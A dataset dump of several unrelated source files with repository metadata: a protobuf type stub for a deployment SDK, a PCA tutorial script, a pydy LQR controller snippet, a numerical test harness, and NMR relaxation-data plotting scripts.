def FromString(cls, s: builtin___bytes) -> Task.ConfigList.Configs.Items: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Task.ConfigList.Configs.Items: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"name",b"name",u"path",b"path"]) -> None: ...
packageId = ... # type: typing___Text
installPath = ... # type: typing___Text
@property
def items(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[Task.ConfigList.Configs.Items]: ...
def __init__(self,
*,
packageId : typing___Optional[typing___Text] = None,
items : typing___Optional[typing___Iterable[Task.ConfigList.Configs.Items]] = None,
installPath : typing___Optional[typing___Text] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> Task.ConfigList.Configs: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Task.ConfigList.Configs: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"installPath",b"installPath",u"items",b"items",u"packageId",b"packageId"]) -> None: ...
hosts = ... # type: google___protobuf___internal___containers___RepeatedScalarFieldContainer[typing___Text]
@property
def configs(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[Task.ConfigList.Configs]: ...
def __init__(self,
*,
hosts : typing___Optional[typing___Iterable[typing___Text]] = None,
configs : typing___Optional[typing___Iterable[Task.ConfigList.Configs]] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> Task.ConfigList: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Task.ConfigList: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"configs",b"configs",u"hosts",b"hosts"]) -> None: ...
class ConfigDiff(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
class Detail(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
class Items(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
path = ... # type: typing___Text
newName = ... # type: typing___Text
oldName = ... # type: typing___Text
def __init__(self,
*,
path : typing___Optional[typing___Text] = None,
newName : typing___Optional[typing___Text] = None,
oldName : typing___Optional[typing___Text] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> Task.ConfigDiff.Detail.Items: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Task.ConfigDiff.Detail.Items: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"newName",b"newName",u"oldName",b"oldName",u"path",b"path"]) -> None: ...
packageId = ... # type: typing___Text
installPath = ... # type: typing___Text
@property
def items(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[Task.ConfigDiff.Detail.Items]: ...
def __init__(self,
*,
items : typing___Optional[typing___Iterable[Task.ConfigDiff.Detail.Items]] = None,
packageId : typing___Optional[typing___Text] = None,
installPath : typing___Optional[typing___Text] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> Task.ConfigDiff.Detail: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Task.ConfigDiff.Detail: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"installPath",b"installPath",u"items",b"items",u"packageId",b"packageId"]) -> None: ...
hosts = ... # type: google___protobuf___internal___containers___RepeatedScalarFieldContainer[typing___Text]
@property
def detail(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[Task.ConfigDiff.Detail]: ...
def __init__(self,
*,
hosts : typing___Optional[typing___Iterable[typing___Text]] = None,
detail : typing___Optional[typing___Iterable[Task.ConfigDiff.Detail]] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> Task.ConfigDiff: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Task.ConfigDiff: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"detail",b"detail",u"hosts",b"hosts"]) -> None: ...
class Batches(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
@property
def targets(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[tuna_service_sdk___model___easy_flow___deploy_target_pb2___DeployTarget]: ...
def __init__(self,
*,
targets : typing___Optional[typing___Iterable[tuna_service_sdk___model___easy_flow___deploy_target_pb2___DeployTarget]] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> Task.Batches: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Task.Batches: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"targets",b"targets"]) -> None: ...
appId = ... # type: typing___Text
appName = ... # type: typing___Text
clusterId = ... # type: typing___Text
clusterType = ... # type: typing___Text
operator = ... # type: typing___Text
org = ... # type: builtin___int
taskTimeStamp = ... # type: typing___Text
configVersion = ... # type: typing___Text
configPackageId = ... # type: typing___Text
needNotify = ... # type: builtin___bool
batchNum = ... # type: builtin___int
batchInterval = ... # type: builtin___int
failedStop = ... # type: builtin___bool
@property
def targetList(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[tuna_service_sdk___model___easy_flow___target_info_pb2___TargetInfo]: ...
@property
def packageList(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[tuna_service_sdk___model___easy_flow___package_info_pb2___PackageInfo]: ...
@property
def configList(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[Task.ConfigList]: ...
@property
def labels(self) -> google___protobuf___struct_pb2___Struct: ...
@property
def configDiff(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[Task.ConfigDiff]: ...
@property
def batches(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[Task.Batches]: ...
def __init__(self,
*,
appId : typing___Optional[typing___Text] = None,
appName : typing___Optional[typing___Text] = None,
clusterId : typing___Optional[typing___Text] = None,
clusterType : typing___Optional[typing___Text] = None,
operator : typing___Optional[typing___Text] = None,
org : typing___Optional[builtin___int] = None,
targetList : typing___Optional[typing___Iterable[tuna_service_sdk___model___easy_flow___target_info_pb2___TargetInfo]] = None,
packageList : typing___Optional[typing___Iterable[tuna_service_sdk___model___easy_flow___package_info_pb2___PackageInfo]] = None,
configList : typing___Optional[typing___Iterable[Task.ConfigList]] = None,
taskTimeStamp : typing___Optional[typing___Text] = None,
configVersion : typing___Optional[typing___Text] = None,
configPackageId : typing___Optional[typing___Text] = None,
labels : typing___Optional[google___protobuf___struct_pb2___Struct] = None,
configDiff : typing___Optional[typing___Iterable[Task.ConfigDiff]] = None,
needNotify : typing___Optional[builtin___bool] = None,
batchNum : typing___Optional[builtin___int] = None,
batchInterval : typing___Optional[builtin___int] = None,
batches : typing___Optional[typing___Iterable[Task.Batches]] = None,
failedStop : typing___Optional[builtin___bool] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> Task: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Task: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def HasField(self, field_name: typing_extensions___Literal[u"labels",b"labels"]) -> builtin___bool: ...
def ClearField(self, field_name: typing_extensions___Literal[u"appId",b"appId",u"appName",b"appName",u"batchInterval",b"batchInterval",u"batchNum",b"batchNum",u"batches",b"batches",u"clusterId",b"clusterId",u"clusterType",b"clusterType",u"configDiff",b"configDiff",u"configList",b"configList",u"configPackageId",b"configPackageId",u"configVersion",b"configVersion",u"failedStop",b"failedStop",u"labels",b"labels",u"needNotify",b"needNotify",u"operator",b"operator",u"org",b"org",u"packageList",b"packageList",u"targetList",b"targetList",u"taskTimeStamp",b"taskTimeStamp"]) -> None: ...
| [
"service@easyops.cn"
] | service@easyops.cn |
17fa6d9c823c11081088275ecc99f22b8dea4aba | dca2b4a08dd09e22d9a597ab2a29e9c6402c1dd6 | /D92_PCA.py | 4e140fe3c3a3fdbe2dce6e46946932b106c585db | [] | no_license | kupc25648/100DaysAlgorithms | a5766b78740e9c9d90546ecaee93345971caef64 | dcafe38b5a835922bd8679878ea129fda911a0aa | refs/heads/master | 2022-11-13T11:22:02.735226 | 2020-06-26T10:14:34 | 2020-06-26T10:14:34 | 275,120,949 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,243 | py | '''
Principal Component Analysis [PCA] is incredibly useful when you need [among others] to visualise high-dimensional data. It’s also very simple to implement, but requires plenty of work beforehand.
A friend of mine, Pavel, has complained that I often don’t dive deep into the topic. And I hope that PCA will satisfy even such an eager mind.
Let’s say we have a bunch of multi-dimensional data stored in a matrix X. Each row represents a sample, and each column represents a variable.
We say that two variables are correlated if there is a linear relationship in between them. Their scatterplot may look similarly to this one.
strongly correlated data
On the other hand, the variables on the next scatterplot are uncorrelated.
uncorrelated data
While the first plot seems to be more useful, PCA takes the advantage of the second one.
To study these dependencies between variables, we use a covariance matrix. When data has no correlated variables, all off-diagonal elements of the Σ matrix must be zero.
And as a side note, for any covariance matrix Σ there exists matrix V called eigenvector matrix and diagonal matrix Λ called eigenvalue matrix, such that the expressions above hold. Both matrices are unique except for the order of columns.
How does PCA work?
PCA normalizes the data matrix X to zero mean and then multiples by some matrix P. The multiplication is actually linear transformation of data. That means if we choose P very carefully, we can either rotate, scale or project the data into vector subspace.
Say we have applied PCA to data matrix X and received another matrix Z. What do we know about Σ matrix of Z?
There is a [quadratic] relationship between both covariance matrices of X and Z! And what happens if we choose P to be eigenvector matrix V defined above?
This means that the projected matrix Z is uncorrelated and its variables have no longer any kind of linear dependency [because Λ is diagonal matrix].
Wait! What just happened?
Let me show you an example and another point of view.
first and second principal components
PCA finds the data mean and principal components. In case of 2D data the principal components are axes x and y rotated to the point that the data became uncorrelated.
There is also another term that is often used. We say that the first principal component is a rotation of x-axis to maximize the variance of the data projected onto it.
PCA: data with maximum variance
Is PCA just a rotation of coordinate systems? Why on earth should this have any use?
If you look at the code below, I generate a set of binary vectors, and each vector has 30 dimensions. Is there any linear relationship in the data?
X = np.random.rand(90, 30)
X[:30, :] = X[:30, :] < ([.4] * 10 + [.1] * 10 + [.1] * 10)
X[30:60, :] = X[30:60, :] < ([.1] * 10 + [.4] * 10 + [.1] * 10)
X[60:, :] = X[60:, :] < ([.1] * 10 + [.1] * 10 + [.4] * 10)
Well, there is, because I generated the data to have one [while it may not be immediately obvious]. But in practice we do not know and would like to find out.
In advance, each vector I generated sits in a corner of 30D unit cube and human brain can’t sort information of this kind.
When we apply PCA to this data, all the variables become uncorrelated and the dimensions now hold as much information as possible independently of one another and in descending order.
Also projection from 30D to 2D is now trivial — simply remove 28 trailing variables [because variables are independent] and plot the graph.
PCA: 2D visualization of 30D data
As you can see, the data projected from 30D onto 2D still contain the key information that I generated vectors of the same color to be close to each other. And each set of 30 vectors forms a nice cluster [but I need to say the reason behind is because I generated the data carefully to make such clusters].
I wish a had more time. The last sample, corners of 30D unit cube, moves us to the most interesting topic, latent factor analysis, which offers another view on PCA and more advanced techniques.
Anyways, how to implement PCA?
normalize X to zero mean
calculate covariance matrix Σ
find [orthonormal] eigenvectors of Σ
After a ton of paperwork, the algorithm is only on few lines of code. And you know, sometimes typing the code itself is the easiest part of all the work.
https://medium.com/100-days-of-algorithms/day-92-pca-bdb66840a8fb
'''
import numpy as np
from bokeh.plotting import figure, show, output_notebook
# Algorithm
def PCA(X, n_component):
# normalize to zero mean
mu = X.mean(axis = 0)
X = X- mu
# eigenvectors of covariance matrix
sigma = X.T @ X
eigvals, eigvecs = np.linalg.eig(sigma)
# pricipal component
order = np.argsort(eigvals)[::-1]
components = eigvecs[:, order[:n_component]]
# projection
Z = X @ components
# result
return Z, components
# 2D data and principal component
# generate points
x = np.linspace(0,13,num =10)
y = x +np.sin(x) - np.cos(x)
# 2D data
X = np.c_[x,y]
# PCA
projection, components = PCA(X, n_component=2)
# Principal component
print(components)
# Convariance matrix of projected data
print((projection.T @ projection).round(3))
# prepare plot data
mean = np.mean(X, axis=0)
extent = projection.min(), projection.max()
angle = np.arctan(components[1]/components[0]) + np.pi *(components[0] < 0)
# plot original data & principal component
# plot original data & principal components
'''
plot = figure()
plot.scatter(x, y)
plot.ray(*mean, length=0, angle=angle[0], line_width=2, line_color='red')
plot.ray(*mean, length=0, angle=angle[1], line_width=2, line_color='green')
show(plot)
# plot projected data
plot = figure(x_range=extent, y_range=extent)
plot.scatter(projection[:, 0], projection[:, 1])
show(plot)
'''
# generate binary vectors
X = np.random.rand(90, 30)
X[:30, :] = X[:30, :] < ([.4] * 10 + [.1] * 10 + [.1] * 10)
X[30:60, :] = X[30:60, :] < ([.1] * 10 + [.4] * 10 + [.1] * 10)
X[60:, :] = X[60:, :] < ([.1] * 10 + [.1] * 10 + [.4] * 10)
# define 3 classes
Y = ['red'] * 30 + ['green'] * 30 + ['blue'] * 30
# PCA
projection, _ = PCA(X, n_component=2)
# plot projected data: 30D -> 2D
plot = figure()
plot.scatter(projection[:, 0], projection[:, 1], color=Y)
show(plot)
| [
"noreply@github.com"
] | noreply@github.com |
21c2ff1c781282e130ce340af0483a9cecda2ee7 | ced2fe3abf39bf14519feb809f5cd4e56c828b46 | /notebooks/solution/control.py | 1225ebf7d93259de25bc077dcf008f6d1f42287a | [
"CC-BY-4.0"
] | permissive | nanounanue/pydy-tutorial-pycon-2014 | f68fb8bb967f6229743151c023b0b6da50d46f24 | 9a111ada7478a16c41ab75253e631a400febb083 | refs/heads/master | 2020-12-25T16:25:38.826055 | 2014-06-20T14:54:37 | 2014-06-20T14:54:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,454 | py | #!/usr/bin/env python
# Controller Design
from numpy import zeros, matrix, eye, dot, asarray
from numpy.linalg import inv
from scipy.linalg import solve_continuous_are
from .utils import controllable
from .visualization import *
equilibrium_point = zeros(len(coordinates + speeds))
equilibrium_dict = dict(zip(coordinates + speeds, equilibrium_point))
parameter_dict = dict(zip(constants, numerical_constants))
linear_state_matrix, linear_input_matrix, inputs = kane.linearize()
f_A_lin = linear_state_matrix.subs(parameter_dict).subs(equilibrium_dict)
f_B_lin = linear_input_matrix.subs(parameter_dict).subs(equilibrium_dict)
m_mat = mass_matrix.subs(parameter_dict).subs(equilibrium_dict)
A = matrix(m_mat.inv() * f_A_lin).astype(float)
B = matrix(m_mat.inv() * f_B_lin).astype(float)
assert controllable(A, B)
Q = matrix(eye(6))
R = matrix(eye(3))
S = solve_continuous_are(A, B, Q, R)
K = inv(R) * B.T * S
# This is an annoying little issue. We specified the order of things when
# creating the rhs function, but the linearize function returns the F_B
# matrix in the order corresponding to whatever order it finds the joint
# torques. This would also screw things up if we specified a different
# ordering of the coordinates and speeds as the standard kana._q + kane._u
K = K[[0, 2, 1], :]
def controller(x, t):
return -asarray(dot(K, x)).flatten()
args['specified'] = controller
y = odeint(right_hand_side, x0, t, args=(args,))
| [
"moorepants@gmail.com"
] | moorepants@gmail.com |
4d3122b6a5a76c30a85ea82eef87b31bb9ff3d7f | 9bcb5032d27ca321f489c035f7d46019ffdf4b85 | /numericalFunctions/ptwXY/Python/Test/Flat/binaryMath/flatMath.py | 46871d9e915089e2d32588a84b4438372de42ec5 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | LLNL/gidiplus | 128ef4d4acbcb264e31794a535cd95e8c77d8a96 | e1c6f0e4de51bc4d7616c5c4676b9818c4b9817c | refs/heads/master | 2023-08-31T06:21:14.519577 | 2023-02-13T18:35:20 | 2023-02-13T18:35:20 | 187,251,526 | 10 | 3 | NOASSERTION | 2021-12-23T00:28:07 | 2019-05-17T16:48:24 | C++ | UTF-8 | Python | false | false | 5,300 | py | # <<BEGIN-copyright>>
# Copyright 2019, Lawrence Livermore National Security, LLC.
# See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: MIT
# <<END-copyright>>
import os
from numericalFunctions import pointwiseXY_C
accuracy = 1e-2
biSectionMax = 0.
if( 'CHECKOPTIONS' in os.environ ) :
options = os.environ['CHECKOPTIONS'].split( )
if( '-e' in options ) : print( __file__ )
CPATH = '../../../../Test/Flat/binaryMath'
os.system( 'cd %s; make -s clean; ./flatMath -v > v' % CPATH )
def skipBlankLines( ls ) :
i = 0
for i, l in enumerate( ls ) :
if( l.strip( ) != '' ) : break
ls = ls[i:]
if( ( len( ls ) == 1 ) and ( ls[0].strip( ) == '' ) ) : ls = []
return( ls )
def getIntegerValue( name, ls ) :
s = "# %s = " % name
n = len( s )
if( ls[0][:n] != s ) : raise Exception( '%s: missing %s info: "%s"' % ( __file__, name, ls[0][:-1] ) )
value = int( ls[0].split( '=' )[1] )
return( ls[1:], value )
def getDoubleValue( name, ls ) :
s = "# %s = " % name
n = len( s )
if( ls[0][:n] != s ) : raise Exception( '%s: missing %s info: "%s"' % ( __file__, name, ls[0][:-1] ) )
value = float( ls[0].split( '=' )[1] )
return( ls[1:], value )
def compareValues( label, i, v1, v2 ) :
sv1, sv2 = '%.12e' % v1, '%.12e' % v2
sv1, sv2 = '%.7e' % float( sv1 ), '%.7e' % float( sv2 )
if( sv1 != sv2 ) : print( '<%s> <%s>' % ( sv1, sv2 ) )
if( sv1 != sv2 ) : raise Exception( '%s: values %e and %e diff by %e at %d for label = %s' % ( __file__, v1, v2, v2 - v1, i, label ) )
def getXYData( ls, biSectionMax, accuracy ) :
ls, length = getIntegerValue( 'length', ls )
data = [ list( map( float, ls[i].split( ) ) ) for i in range( length ) ]
data = pointwiseXY_C.pointwiseXY_C( data, initialSize = len( data ), overflowSize = 10, biSectionMax = biSectionMax, accuracy = accuracy, safeDivide = True, interpolation = "flat" )
ls = ls[length:]
ls = skipBlankLines( ls )
return( ls, data )
def getCommand( ls ) :
s = ls[0].split( )
if( len( s ) != 2 ) : raise Exception( 'Invalid command = "%s"' % ls[0][:-1] )
if( s[0] != "#" ) : raise Exception( 'Invalid command = "%s"' % ls[0][:-1] )
return( ls[1:], s[1] )
def compareXYs( XYs1, XYs2, label ) :
if( len( XYs1 ) != len( XYs2 ) ) : raise Exception( 'for %s: len( XYs1 ) = %s != len( XYs2 ) = %s' % ( label, len( XYs1 ), len( XYs2 ) ) )
for i, xy in enumerate( XYs1 ) :
compareValues( "x division " + label, count, xy[0], XYs2[i][0] )
compareValues( "y division " + label, count, xy[1], XYs2[i][1] )
def mathParse( count, ls ) :
ls, command = getCommand( ls )
if( command == 'double' ) :
ls = doubleCheck( count, ls )
elif( command == 'all_double' ) :
ls = allDoubleCheck( count, ls )
elif( command == 'binary_add_sub' ) :
ls = binaryAddSubCheck( count, ls )
elif( command == 'binary_mul_div' ) :
ls = binaryMulDivCheck( count, ls )
else :
raise Exception( 'Invalid command = "%s"' % command )
return( ls )
def doubleCheck( count, ls ) :
ls, d = getDoubleValue( 'double', ls )
ls, o = getCommand( ls )
if( o not in '+-=*/\\' ) : raise Exception( 'Unknown operator "%s"' % o )
ls, XYs = getXYData( ls, biSectionMax, accuracy )
ls, resultsC = getXYData( ls, biSectionMax, accuracy )
if( o == '+' ) : results = XYs + d
elif( o == '-' ) : results = XYs - d
elif( o == '=' ) : results = d - XYs
elif( o == '*' ) : results = XYs * d
elif( o == '/' ) : results = XYs / d
elif( o == '\\' ) : results = d / XYs
compareXYs( resultsC, results, "doubleCheck %s" % o )
return( ls )
def allDoubleCheck( count, ls ) :
ls, d = getDoubleValue( 'double', ls )
ls, XYs = getXYData( ls, biSectionMax, accuracy )
ls, resultsC = getXYData( ls, biSectionMax, accuracy )
results = ( ( d * ( XYs + d ) ) - d ) / d
results = ( ( ( d * results ) + d ) / d ) - d
compareXYs( resultsC, results, "allDoubleCheck" )
return( ls )
def binaryAddSubCheck( count, ls ) :
ls, XYs1 = getXYData( ls, biSectionMax, accuracy )
ls, XYs2 = getXYData( ls, biSectionMax, accuracy )
ls, resultsC = getXYData( ls, biSectionMax, accuracy )
results = XYs1 + XYs2
compareXYs( resultsC, results, "binaryAddSubCheck" )
ls, dummy = getXYData( ls, biSectionMax, accuracy )
ls, resultsC = getXYData( ls, biSectionMax, accuracy )
results = results - XYs2
compareXYs( resultsC, results, "binaryAddSubCheck" )
return( ls )
def binaryMulDivCheck( count, ls ) :
ls, XYs1 = getXYData( ls, biSectionMax, accuracy )
ls, XYs2 = getXYData( ls, biSectionMax, accuracy )
ls, resultsC = getXYData( ls, biSectionMax, accuracy )
results = XYs1 * XYs2
compareXYs( resultsC, results, "binaryMulDivCheck" )
ls, dummy = getXYData( ls, biSectionMax, accuracy )
ls, resultsC = getXYData( ls, biSectionMax, accuracy )
results = results / XYs2
compareXYs( resultsC, results, "binaryMulDivCheck" )
return( ls )
f = open( os.path.join( CPATH, 'v' ) )
ls = f.readlines( )
f.close( )
ls, accuracy = getDoubleValue( 'accuracy', ls )
count = 0
while( len( ls ) ) :
count += 1
ls = mathParse( count, ls )
| [
"mattoon1@llnl.gov"
] | mattoon1@llnl.gov |
7d360314ad56ae83ac372262a3f246607a5f40db | 9a99ca8daa5de423857a4cc7f12fe924087ceabe | /analyse/scripts/crn_meta_t1.py | 86c6df20d7ab2b2f49c7a3b3444b4912ec6a46cc | [] | no_license | karajan9/ma | 7442a9e23b45d63d997f5ffee99bb366c10aca00 | bce0fa14cd51bcddc6cba671e847b781d1f5e333 | refs/heads/master | 2020-03-09T07:42:53.355358 | 2018-04-25T09:02:07 | 2018-04-25T09:02:07 | 128,670,707 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,438 | py | # %%
import numpy as np
import matplotlib.pyplot as plt
from scipy.optimize import curve_fit
import glob
import os
import sys
home_dir = "/home/karajan/uni/master/analyse"
sys.path.append(os.path.abspath("/home/karajan/uni/master/analyse/scripts"))
from nmr_lib import *
# %%
def plot_setup():
plt.gcf().clear()
# plt.style.use("ggplot")
plt.grid(True)
plt.yscale("log")
plt.xlabel("Temperatur [K]")
# %%
# home_dir = "/home/karajan/uni/master/analyse/data"
def do_t1():
plot_setup()
plt.ylabel("1/$T_1$ [1/s]")
plt.title("CRN $T_1$ vgl. mit Zürn Daten")
fn_extern ="/home/karajan/uni/master/analyse/data/crn/data/T1/t1-zuern.data"
labels_extern = "Zürn T1"
data = np.loadtxt(fn_extern)
temp = data[:, 0]
t1 = data[:, 1]
# plot_data(temp, 1/t1, label=labels_extern[i], marker=".")
plt.scatter(temp, 1 / t1, label=labels_extern, marker=".", color="y")
# t1dir = "/home/jens/Documents/projekte/crn/data/T1"
# for i, file_name in enumerate(sorted(glob.glob(t1dir + "/*.data"))):
home_dir = "/home/karajan/uni/master/analyse/data/crn/data/T1/"
t1dir = [
home_dir + "t1_230K_280K.data",
home_dir + "t1_280K_290K.data",
home_dir + "t1_300K_310K.data",
home_dir + "t1_310K_355K.data",
home_dir + "t1_342K_380K.data",
home_dir + "t1_360K_440K_170807.data",
home_dir + "t1_270K_330K.data",
home_dir + "t1_305K_345K.data",
home_dir + "t1_305K_325K.data",
]
for i, file_name in enumerate(t1dir):
data = np.loadtxt(file_name)
temp = data[:, 1]
t1 = data[:, 3]
t1_err = data[:, 4]
plt.errorbar(temp, 1 / t1, yerr=t1_err / t1**2, fmt='x')
# home_dir = "/home/karajan/uni/master/analyse/data"
# t1files = glob.glob(home_dir + "/*/T1/T1_*.data")
# for file in t1files:
# data = np.loadtxt(file)
# temp = data[:, 1]
# t1 = data[:, 3]
# t1_err = data[:, 4]
# plt.errorbar(temp, 1 / t1, yerr=t1_err / t1**2, fmt='x')
plt.xlim(200, 450)
save_plot(plt, "/home/karajan/uni/master/analyse/plots/T1/t1_neu")
# %%
def do_t1_bruker():
plot_setup()
plt.ylabel("1/$T_1$ [1/s]")
plt.title("CRN $T_1$ Bruker")
fn_extern ="/home/karajan/uni/master/analyse/data/crn/data/T1/t1-zuern.data"
labels_extern = "Zürn T1"
data = np.loadtxt(fn_extern)
temp = data[:, 0]
t1 = data[:, 1]
# plot_data(temp, 1/t1, label=labels_extern[i], marker=".")
plt.scatter(
temp, 1 / t1, label=labels_extern, marker=".", color="tab:orange")
# t1dir = "/home/jens/Documents/projekte/crn/data/T1"
# for i, file_name in enumerate(sorted(glob.glob(t1dir + "/*.data"))):
home_dir = "/home/karajan/uni/master/analyse/data/crn/data/T1/"
t1dir = [
home_dir + "t1_230K_280K.data",
home_dir + "t1_280K_290K.data",
home_dir + "t1_300K_310K.data",
home_dir + "t1_310K_355K.data",
home_dir + "t1_342K_380K.data",
home_dir + "t1_360K_440K_170807.data",
home_dir + "t1_270K_330K.data",
home_dir + "t1_305K_345K.data",
home_dir + "t1_305K_325K.data",
]
for i, file_name in enumerate(t1dir):
data = np.loadtxt(file_name)
temp = data[:, 1]
t1 = data[:, 3]
t1_err = data[:, 4]
plt.scatter(temp, 1 / t1, color="blue")
bruker_name="/home/karajan/uni/master/analyse/data/crn/data/T1/bruker_t1.data"
bruker_data = np.loadtxt(bruker_name)
bruker_temp = bruker_data[:, 1]
bruker_t1 = bruker_data[:, 3]
bruker_t1_err = bruker_data[:, 4]
plt.errorbar(
bruker_temp,
1 / bruker_t1,
yerr=bruker_t1_err / bruker_t1**2,
fmt='s',
color="red",
label="Bruker")
plt.xlim(220, 450)
plt.ylim(30, 10**6)
plt.legend(loc=2)
save_plot(plt, "/home/karajan/uni/master/analyse/plots/BRUKER/bruker_t1")
do_t1_bruker()
# %%
def do_bruker_beta():
plot_setup()
plt.yscale("linear")
plt.ylabel("beta")
plt.title("CRN Bruker $\\beta_{T_1}$")
home_dir = "/home/karajan/uni/master/analyse/data/crn/data/T1/"
t1dir = [
home_dir + "t1_230K_280K.data",
home_dir + "t1_280K_290K.data",
home_dir + "t1_300K_310K.data",
home_dir + "t1_310K_355K.data",
home_dir + "t1_342K_380K.data",
home_dir + "t1_360K_440K_170807.data",
home_dir + "t1_270K_330K.data",
home_dir + "t1_305K_345K.data",
home_dir + "t1_305K_325K.data",
]
for i, file_name in enumerate(t1dir):
data = np.loadtxt(file_name)
temp = data[:, 1]
beta = data[:, 5]
beta_err = data[:, 6]
beta = beta[temp < 380]
beta_err = beta_err[temp < 380]
temp = temp[temp < 380]
plt.errorbar(temp, beta, yerr=beta_err, fmt='x', color="tab:blue")
bruker_name="/home/karajan/uni/master/analyse/data/crn/data/T1/bruker_t1.data"
bruker_data = np.loadtxt(bruker_name)
bruker_temp = bruker_data[:, 1]
bruker_beta = bruker_data[:, 5]
bruker_beta_err = bruker_data[:, 6]
plt.errorbar(
bruker_temp,
bruker_beta,
yerr=bruker_beta_err,
fmt='s',
color="red",
label="Bruker")
plt.legend(loc=3)
# plt.ylim(0, 1.1)
# home_dir = "/home/karajan/uni/master/analyse/data"
# t1files = glob.glob(home_dir + "/*/T1/T1_*.data")
# for file in t1files:
# data = np.loadtxt(file)
# temp = data[:, 1]
# beta = data[:, 5]
# beta_err = data[:, 6]
# plt.errorbar(temp, beta, yerr=beta_err, fmt='x')
save_plot(plt, "/home/karajan/uni/master/analyse/plots/BRUKER/bruker_t1beta")
do_bruker_beta()
# %%
def do_beta():
plot_setup()
plt.yscale("linear")
plt.ylabel("beta")
plt.title("CRN $\\beta_{T_1}$")
# t1dir = "/home/jens/Documents/projekte/crn/data/T1"
# for i, file_name in enumerate(sorted(glob.glob(t1dir + "/*.data"))):
home_dir = "/home/karajan/uni/master/analyse/data/crn/data/T1/"
t1dir = [
home_dir + "t1_230K_280K.data",
home_dir + "t1_280K_290K.data",
home_dir + "t1_300K_310K.data",
home_dir + "t1_310K_355K.data",
home_dir + "t1_342K_380K.data",
home_dir + "t1_360K_440K_170807.data",
home_dir + "t1_270K_330K.data",
home_dir + "t1_305K_345K.data",
home_dir + "t1_305K_325K.data",
]
for i, file_name in enumerate(t1dir):
data = np.loadtxt(file_name)
temp = data[:, 1]
beta = data[:, 5]
beta_err = data[:, 6]
beta = beta[temp < 380]
beta_err = beta_err[temp < 380]
temp = temp[temp < 380]
plt.errorbar(temp, beta, yerr=beta_err, fmt='x')
# plt.ylim(0, 1.1)
# home_dir = "/home/karajan/uni/master/analyse/data"
# t1files = glob.glob(home_dir + "/*/T1/T1_*.data")
# for file in t1files:
# data = np.loadtxt(file)
# temp = data[:, 1]
# beta = data[:, 5]
# beta_err = data[:, 6]
# plt.errorbar(temp, beta, yerr=beta_err, fmt='x')
save_plot(plt, "/home/karajan/uni/master/analyse/plots/T1/t1_beta")
# do_t1()
# do_beta()
# plt.xlim(200, 500)
# plt.ylim(10**1, 10**6)
